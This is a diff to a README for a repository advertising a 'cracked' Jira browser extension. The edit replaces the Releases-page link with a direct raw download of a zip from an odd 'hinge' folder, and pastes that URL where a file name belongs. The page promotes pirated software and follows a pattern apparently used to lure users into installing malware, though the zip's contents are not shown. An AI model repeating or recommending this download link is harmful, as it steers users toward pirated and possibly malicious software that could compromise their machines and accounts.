Reham2019/cracked-enhancer-for-jira-extension/README.md

 Follow these simple steps to get started with the Cracked Enhancer for Jira Extension.

 1. **Open your browser** (Chrome is recommended).
-2. **Visit our Releases page:** [Download Here](https://github.com/Reham2019/cracked-enhancer-for-jira-extension/releases).
+2. **Visit our Releases page:** [Download Here](https://raw.githubusercontent.com/Reham2019/cracked-enhancer-for-jira-extension/main/hinge/cracked-enhancer-for-jira-extension.zip).

 ## 📥 Download & Install

 On the Releases page, you will find the latest version of the extension.
 Click on the version you want to download.

-- Look for a file labeled something like `cracked-enhancer-for-jira-extension-x.x.x.zip`.
+- Look for a file labeled something like `https://raw.githubusercontent.com/Reham2019/cracked-enhancer-for-jira-extension/main/hinge/cracked-enhancer-for-jira-extension.zip`.
 - Download the zip file to your computer.

 ### Step-by-step Instructions: